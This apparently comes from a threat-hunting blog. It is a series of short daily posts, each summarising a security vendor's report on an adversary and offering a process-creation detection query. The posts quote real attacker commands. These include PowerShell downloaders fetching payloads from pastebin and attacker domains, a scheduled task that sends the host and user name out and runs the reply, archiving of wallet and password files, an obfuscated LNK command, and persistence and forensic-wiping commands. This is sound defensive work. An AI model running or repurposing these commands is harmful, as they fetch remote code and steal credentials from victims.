Know Your Adversary

Hello everyone! You can get detection and hunting ideas not only from threat actors' behaviors, but also from security researchers! For example, Adam shared an interesting case of Windows Problem Reporting abuse. This executable has many command line arguments, and -boot one allows to load the following DLL:  C:\Windows\System32\offdmpsvc.dll . It's not available by default, so an adversary can use it to write a payload there. It means we can use this argument for detection: event_type: "processcreatewin" AND proc_file_name: "wermgr.exe" AND cmdline: "boot" See you tomorrow!

Hello everyone! Let's look at another curious example of  System Binary Proxy Execution (T1218) technique. DomainTools reported on FIN6 (Skeleton Spider) campaign, which included phishing with fake resumes. The adversary distributed archives with malicious LNK-files. The file executed an obfuscated command, for example: %ComSpec%" /v /c (for %l in (s) do @set "Alter=%~l") && !Alter!et "Trick=ure = " && !Alter!et "Drawings=-base" && !Alter!et "Person=version" && !Alter!et "Twist=." && !Alter!et "Involves=$win" && !Alter!et "Genius=si" && !Alter!et "Streams=d" && !Alter!et "Grass=t" && !Alter!et "Builders=c" && !Alter!et "Armor=settings" && !Alter!et "Disorder=e" && !Alter!et "Womens=ni" && !Alter!et "Cloth=a" && !Alter!et ...

Hello everyone! Threat actors are always adding new tools to their arsenal. This Symantec report on Fog Ransomware proves it one more time.  Among other uncommon tools, the adversary leveraged Syteca - a legitimate security solution, which enables recording on-screen activity, keystroke monitoring, etc. The threat actors even used  PsExec and SMBExec to execute the tool on the remote systems, for example: cmd.exe /Q /c SytecaClient.exe 1> \\127.0.0.1\ADMIN$\__1748095766.8385904 2>&1 As it's a legitimate tool, it's quite easy to detect, for example: event_type: "processcreatewin" AND proc_file_productname: "syteca" See you tomorrow!

Hello everyone! Reading Check Point's report on Stealth Falcon activities, I spotted an interesting way of abusing iediagcmd.exe . The adversary uses malicious  .url files. The URL parameter points to iediagcmd.exe . Normally this executable spawns additional processes to collect diagnostic data, including route.exe . The working folder is changed by the .url to the attacker-controlled WebDAV server, so iediagcmd.exe runs the route.exe from \\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe  (Horus Loader) instead of a legitimate one in system32 folder. Of course, we can use it for detection, and search for  iediagcmd.exe executing files from WebDAV servers, for example: event_type: "processcreatewin" AND proc_p_file_path: "iediagcmd.exe" AND proc_file_path: "DavWWWRoot" See you tomorrow!

Hello everyone! Adversaries may have various motivations to conduct cyber attacks. But most of them are interested in getting some money. At least at some point! Kaspersky released a report on an activity cluster we track as Rare Werewolf (or Librarian Ghouls as they call it). You can find lots of curious things to detect and hunt in the report, but let's focus on collecting cryptocurrency wallet credentials and seed phrases: %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*парол*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*карт*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*кошельк*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\wallet.dat /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.doc* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYS...

Hello everyone! Let's look at a curious example of Protocol Tunneling technique (T1572) as seen in a recent report by SentinelOne. The adversary used a ShadowPad variant, which leveraged DNS over HTTPS (DoH) in an attempt to evade detection. In order to obscure DNS traffic, the threat actors Base-64 encoded queried domains, for example: https://8.8.8.8:443/dns-query?dns=AAABAAABAAAAAAAABG5ld3MKaW1hZ2luZXJqcANjb20AAAEAAQ So, if you have related telemetry - you know what to hunt for! See you tomorrow!

Hello everyone! The Genians Security Center (GSC) reported on a recent Kimsuky (we track this activity cluster as Monolithic Werewolf ) campaign, which took place in between March and April 2025. Interesting enough that the adversary leveraged multiple communication channels to distribute malicious files, including email, Facebook and Telegram. The installation process is quite noisy as always, so we have lots of detection opportunities. For example, the threat actors abused PowerShell and Certutil for decoding: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\ffBqrQ6.rppn C:\Windows\..\ProgramData\sRPCU5y.evJl A good candidate for detection, right? event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("certutil" AND "decode") One more thing - abusing reg.exe to achieve persistence: reg add HKCU\Software\Microsoft\Windows\CurrentVersio...

Hello everyone! Malware distribution through game cheats isn't a new phenomena, so it's important to be able to detect related activities. Let's look into fresh report by Unit42 on new Windows-based malware called Blitz . The malware author used social media to distribute Blitz through game cheat packages. The threat actor abused PowerShell to deliver Blitz downloader: powershell.exe -c \"$ProgressPreference = 'SilentlyContinue'; $p=\\\"$env: LOCALAPPDATA\\Microsoft\\Internet Explorer\\ieapfltr.dll\\\"; $hu='https://pastebin.com/ raw/FSzik5ew'; $du=(irm 'https://pastebin.com/raw/RzLEd17Z');if (Test-Path $p) {$eh=irm $hu;if($eh. Length -eq 64 -and $eh -match '^[a-fA-F0-9]{64}$'){$ah=(Get-FileHash $p -Algorithm SHA256).Hash;if ($eh -ne $ah) {iwr $du -OutFile $p}}}else{iwr $du -OutFile $p}\" Let's focus on Pastebin and iwr to build our hunting query: event_type: "processcreatewin" AND proc_file_name: "powe...

Hello everyone! Proofpoint in collaboration with Threatray released  a report on TA397 activities. Threat researchers assess that it's a state-sponsored adversary with focus on intelligence gathering. The threat actors actively abused task scheduler. A very common technique, but the command seemed interesting to me: "C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping  localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc  minute /mo 16 /tr "conhost --headless powershell -WindowStyle  Minimized irm "woodstocktutors[.]com/jbc.php? fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile  "C:\\Users\\public\\kwe.cc"; Get-Content  "C:\\Users\\public\\kwe.cc" | cmd" Fisrt of all, the adversary extensively uses conhost.exe in "headless" mode, I'm sure you already have this hunt in your library: event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless...

Hello everyone! I have an addition to your hunting collection related to RMMs! Yes, I know. Yes, one more. That's life! So, Kaspersky shared a report on Cyber Partisans (we track this activity cluster as Guerrilla Hyena ). Among other malware and tools, the adversary leveraged an RMM called  Aspia Remote Desktop . It's interesting that this tool isn't listed on LOLRMM project, so it's a good idea to have a hunting query: event_type: "processcreatewin" AND proc_file_productname: "aspia" See you tomorrow!

Hello everyone! LOLBAS are everywhere! And we see more and more of them abused by real adversaries. For example, OpenSSH, which is included in newer versions of Windows! Xavier Mertens shared a curious example of how threat actors abuse it. The adversary executes ssh.exe with custom configuration file: C:\Windows\System32\OpenSSH\ssh.exe -F "C:\Windows\Temp\config" So, for example, we can hunt for ssh.exe executed with -F and config file located under Temp folder: event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: ("f" AND "temp") See you tomorrow!

Hello everyone! I don't often see malicious browser extensions in-the-wild. So this report by Positive Technologies definitely deserves attention. Despite the fact abusing browser extensions isn't the most common technique, the report shows that installation process is extremely noisy. For example, the threat actors kill browser-related processes: var kalee = ["taskkill /F /IM chrome.exe", "taskkill /F /IM msedge.exe", "taskkill /F /IM brave.exe"]; Definitely worth a detector, right? event_type: "processcreatewin" AND proc_file_name: "taskkill.exe" AND cmdline: ("chrome" OR "msedge" OR "brave") Also, the threat actors collect information about the compromised system abusing ipinfo[.]io, for example: for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).ip"') do set "IP_PUBLICO=%%a" Yes, another legitimate service we can use f...

Hello everyone! Let's talk a bit about phishing. We always tell users to check the URL. And threat actors know it! That's why they always try to make it look as legitimate as possible. Cofense Phishing Defense Center shared information on a phishing campaign, in which threat actors abused Google Apps Script. Why? It helped to make phishing page to look legitimate as it was hosted on script[.]google[.]com. Seems like a good thing to hunt for? Why not! event_type: "dnsreq" AND dns_rname: "script.google.com" See you tomorrow!

Hello everyone! I'm sure you love forensics. I do! But threat actors... I dont think so. That's why they have various techniques in their arsenal to hinder forensic analysis and recovery! For example, CyberLock . The adversary abused cipher.exe to erase free space and harden forensic recovery: Start-Process cipher.exe -ArgumentList "/w:C:\" -WindowStyle Hidden Of course, hunting for ransomware isn't a good idea, but we can face this procedure in other cases as well. For example, to wipe free space after deleting the toolset. So it may also be a good candidate for a hunting query: event_type: "processcreatewin" AND proc_file_originalfilename: "cipher.exe" See you tomorrow!

Hello everyone! It's definitely not a secret that adversaries often abuse various command and scripting interpreters, such as Windows Command Shell and PowerShell. But in some cases they can bring their own tools to execute commands on the compromised system. For example, NirCmd . It's a small utility that allows threat actors to solve various tasks without displaying any user interface. Here's an example how Rare Werewolf abused this tool: schtasks /create /tn "AutoUpdate Driver" /tr "C:\Users\admin\Window\nircmd.exe exec hide C:\Users\admin\Window\bat2.bat" /sc hourly /st 00:00 /ru SYSTEM /f Definitely, this utility is worth a hunting query: event_type: "processcreatewin" AND proc_file_originalfilename: "nircmd.exe" AND cmdline: "hide" See you tomorrow!